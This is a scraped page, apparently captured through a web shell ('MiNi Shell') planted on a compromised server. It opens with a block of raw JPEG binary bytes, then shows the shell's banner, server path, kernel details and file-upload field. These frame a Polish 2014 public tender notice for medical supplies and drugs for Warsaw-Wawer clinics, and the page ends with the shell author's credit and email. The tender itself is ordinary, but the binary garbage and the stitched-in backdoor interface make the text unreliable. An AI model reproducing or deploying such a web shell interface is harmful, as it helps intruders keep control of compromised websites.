JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140703/223210-N-2014.html

<p class="kh_header"><b>Warszawa: Przedmiotem umowy jest sukcesywna dostawa  artykułów medycznych w podziale na 15 pakietów  oraz leków (część 16) 
WYKAZ części/pakietów w SIWZ.</b><br>
<b>Numer ogłoszenia: 223210 - 2014; data zamieszczenia: 03.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa Wawer , ul. Strusia 4/8, 04-564 Warszawa, woj. mazowieckie, tel. 22 590 09 23, faks 22 812 07 96.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-wawer.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem umowy jest sukcesywna dostawa  artykułów medycznych w podziale na 15 pakietów  oraz leków (część 16) 
WYKAZ części/pakietów w SIWZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest sukcesywna dostawa  artykułów medycznych w podziale na 15 pakietów  oraz leków (część 16) 
WYKAZ części/pakietów:
1) igły , strzykawki, przyrządy do infuzji, wenflony  - część 1
2) rękawiczki - część 2
3) wata, gaza, lignina - część 3
4) opaski dziane, elastyczne, przylepce, gaziki - część 4
5) materiały do sterylizacji - część 5
6) żel do aparatów  ekg i usg - część 6
7) szpatułki drewniane - część 7
8) papiery termoczułe do aparatów ekg, usg i laboratoryjnych oraz jednorazowe ustniki do spirometru, gruszki, elektrody - część 8
9) wzierniki uszne do otoskopów - część 9
10)pojemniki na odpady medyczne - część 10
11) wzierniki ginekologiczne - część 11
12) szczoteczki cytologiczne - część 12
13) szkiełka do cytologii - część 13
14) osłonki medyczne ginekologiczne na sondy usg - część 14
15) podkłady jednorazowe na kozetki lekarskie - część 15
16) LEKI - część 16
do przychodni rejonowych należących do SZPZLO W-wa Wawer  tj. do:
-	Przychodni Rejonowej Nr 1 przy ul. Strusia 4/8 ( Marysin Wawerski) 
-	Przychodni Rejonowej Nr 2 przy ul. Patriotów 170 (Radość)
-	Przychodni Rejonowej Nr 3 przy ul. Żegańskiej 2C (Międzylesie)
-	Przychodni Rejonowej Nr 4 przy ul. Korkowej 87  (Marysin Wawerski)
-	Przychodni Rejonowej Nr 5 przy ul. Trakt Lubelski 167 (Zerzeń)
-	Przychodni Rejonowej Nr 6 przy ul. Patriotów 46/48 (Falenica)
2. Szczegółowy opis przedmiotu zamówienia, w tym również  wielkości dostaw i ich rodzaje  przedstawiono w kosztorysach ofertowych (odpowiednio dla części), stanowiących załączniki od 4.1 do 4.16  do SIWZ oraz w pkt. 3.7 SIWZ.
3. Wymagany termin ważności towarów min. 6 miesięcy od dnia dostarczenia danej partii towaru - dot. wszystkich części.
4.Niektóre wymagania jakościowe:
4.1 Sterylne wzierniki ginekologiczne jednorazowego użytku typu CUSCO małe Długość całkowita górnej łyżki wziernika 10,5 cm. Długość części zwężonej min. 7,5 cm (mierzona po zewnętrznej stronie krawędzi bocznej łyżki). Szerokość części zwężonej  od 1,9 cm do 2,1 cm., oznaczenie kolorem białym na zamku centralnym, opakowanie jałowe, każda sztuka pakowana oddzielnie . 
4.2 Sterylne wzierniki ginekologiczne jednorazowego użytku typu CUSCO średnie. Długość całkowita górnej łyżki wziernika 10,5 cm. Długość części zwężonej min.  8 cm (mierzona po zewnętrznej stronie krawędzi bocznej łyżki). Szerokość części zwężonej od 2,4 cm. do 2,6 cm, oznaczenie kolorem czerwonym na zamku centralnym, opakowanie jałowe, każda sztuka pakowana oddzielnie.
4.3 Sterylne wzierniki ginekologiczne jednorazowego użytku typu CUSCO duże. Długość całkowita górnej łyżki wziernika 10,5 cm. Długość części zwężonej min.  9 cm (mierzona po zewnętrznej stronie krawędzi bocznej łyżki). Szerokość części zwężonej  od 2,8 cm. do 3,2 cm, oznaczenie kolorem zielonym na zamku centralnym, opakowanie jałowe, każda sztuka pakowana oddzielnie.
4.4 Szkiełka do pobierania cytologii, bezbarwne, krawędzie cięte, z obustronnie matowym polem do opisu, rozmiar 76 mm x 26 mm.
4.5 Jednorazowe szczoteczki typu miotełka ultrabrush umożliwiające pobranie rozmazu jednocześnie z tarczy części pochwowej oraz z kanału szyjki macicy - pakowane pojedynczo, sterylne, wykonane z tworzywa sztucznego z giętkimi włoskami rozmieszczonymi wachlarzowato, środkowa część wachlarza dłuższa, bez ostrych zakończeń. 
4.6 Osłonki medyczne na sondy USG dopochwowe, pakowane jednostkowo, pudrowane, bez zbiorniczka.
4.7 Jednorazowe higieniczne podkłady ochronne bibułowo-foliowe. Podkłady  w rolce o szerokości w granicach 50 cm +,- 1 cm. i długości nawinięcia 50 mb, z perforacją co 38 -50 cm.
4.8 Jednorazowe higieniczne podkłady ochronne celulozowe, dwuwarstwowe, o szerokości 50cm +,- 1 cm., długości 80 mb z perforacją.
5. Przedmiot zamówienia  musi być dopuszczony do obrotu i używania na terenie RP, zgodnie z wymogami:
- ustawy o wyrobach  medycznych z dnia 20 maja 2010 r. ( Dz. U. z  2010 r., nr 107, poz. 679 ze zm.) dla wyrobów medycznych,
- ustawy z dnia 6 września 2001 r. Prawo Farmaceutyczne ( Dz. U.  z 2008  r., nr 45, poz. 271 ze zm.) dla produktów leczniczych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.60.00.00-6, 33.14.13.20-9, 33.14.13.10-6, 33.19.41.00-7, 33.14.12.20-8, 33.14.14.20-0, 33.14.11.15-9, 33.14.11.14-2, 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.18-0, 33.19.10.00-5, 33.14.00.00-3, 22.99.30.00-7, 34.92.84.80-6, 33.77.00.00-8, 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca posiadał aktualną koncesję, zezwolenie, licencję na prowadzenie hurtowni farmaceutycznej, składu celnego, składu konsygnacyjnego w zakresie objętym niniejszym zamówieniem - dot. tylko części nr 16.
Spełnienie przez Wykonawcę ww. warunku Zamawiający oceni na podstawie wypełnionego i podpisanego oświadczenia w zakresie art. 22 ust. 1 pkt.1-4 ustawy PZP, według wzoru stanowiącego załącznik nr 5 do SIWZ oraz załączonej koncesji, zezwolenia, licencji na prowadzenie hurtowni farmaceutycznej, składu celnego, składu konsygnacyjnego w zakresie objętym niniejszym zamówieniem. 
W zakresie pakietów 1-15 zamawiający nie wyznacza szczegółowego warunku.
Spełnienie przez Wykonawcę ww. warunku Zamawiający oceni na podstawie wypełnionego i podpisanego oświadczenia w zakresie art. 22 ust. 1 pkt.1-4 ustawy PZP, według wzoru stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Spełnienie warunków zamawiający oceni na podstawie złożonego oświadczenia z art. 22 według załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Spełnienie warunków zamawiający oceni na podstawie złożonego oświadczenia z art. 22 według załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Spełnienie warunków zamawiający oceni na podstawie złożonego oświadczenia z art. 22 według załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Spełnienie warunków zamawiający oceni na podstawie złożonego oświadczenia z art. 22 według załącznika nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie potwierdzające dopuszczenie do obrotu oferowanych produktów na terenie RP, zgodnie z przepisami prawa, z wykorzystaniem wzoru załącznika nr 3 do specyfikacji istotnych warunków zamówienia  - dot. pakietów 1-16.
2. Ulotki, katalogi, karty charakterystyki, inne dokumentów potwierdzających spełnienie parametrów określonych w kosztorysach ofertowych w zał. nr 4.1-4.15 do SIWZ - dot. pakietów nr 1-15 oraz wszystkich pozycji ujętych w kosztorysach.
3.Próbki towaru - dot. pakietów nr 8,11,12,15
wymagane próbki:
 - ustniki do spirometrów  - po  1 sztuce ustników określonych w poz. 6 i 7 kosztorysu ofertowego ( zał. nr 4.8 do SIWZ) 
 - wzierniki ginekologiczne - po 1 sztuce każdego rozmiaru wzierników
 - szczoteczki cytologiczne - 1 szt.
 - podkłady jednorazowe na kozetki lekarskie - min. po 1 metrze każdego rodzaju podkładu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmiany umowy w następujących okolicznościach ( części 1-15) :
-	nastąpiła zmiana danych podmiotów zawierających umowę ( np. dane rejestrowe)
-	uległa zmianie nazwa handlowa produktu, numer katalogowy, sposób konfekcjonowania lub ilość sztuk w opakowaniu o ile zmiany te zostały dokonane przez producenta i potwierdzone stosownym dokumentem
-	uległa zmianie stawka podatku VAT,
-	wycofano produkt z rynku, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,
-	zaprzestano produkcji, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,
-     zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
         -    w przypadku gdy, przed upływem terminu obowiązywania umowy nie zostanie wyczerpana kwota wartościowa dla poszczególnych części/pakietów umowa może zostać przedłużona do czasu realizacji pełnego zamówienia.
Dopuszcza się możliwość dokonania zmiany umowy w następujących okolicznościach (część nr 16):
-	nastąpiła zmiana danych podmiotów zawierających umowę ( np. dane rejestrowe)
-	uległa zmianie nazwa handlowa produktu, numer katalogowy, sposób konfekcjonowania lub ilość sztuk w opakowaniu o ile zmiany te zostały dokonane przez producenta i potwierdzone stosownym dokumentem
-	uległa zmianie stawka podatku VAT,
-	zmieniła się cena urzędowa,
-	wycofano produkt z rynku, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,
-	zaprzestano produkcji, w tym przypadku produkt zostanie zastąpiony produktem równoważnym przy zastosowaniu ceny nie wyższej niż w umowie,
-	w przypadku zaistnienia incydentu medycznego - możliwość wprowadzenia produktu równoważnego o tych samych parametrach i zastosowaniu,
-	zmiany cen urzędowych leków, wprowadzonych rozporządzeniem odpowiedniego Ministra, przy czym zmiany te mogą dotyczyć podwyższenia, jak i obniżenia cen oraz dodania nowych, a także skreślenia leków wcześniej objętych cenami urzędowymi,
-	zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
 -    w przypadku gdy, przed upływem terminu obowiązywania umowy nie zostanie wyczerpana kwota wartościowa umowy może zostać przedłużona do czasu realizacji pełnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz-wawer.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPZLO W-wa Wawer
ul. Strusia 4/8
04-564 Warszawa
budynek A, III piętro, pokój 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 10:00, miejsce: SZPZLO W-wa Wawer
ul. Strusia 4/8
04-564 Warszawa
budynek A, III piętro, pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com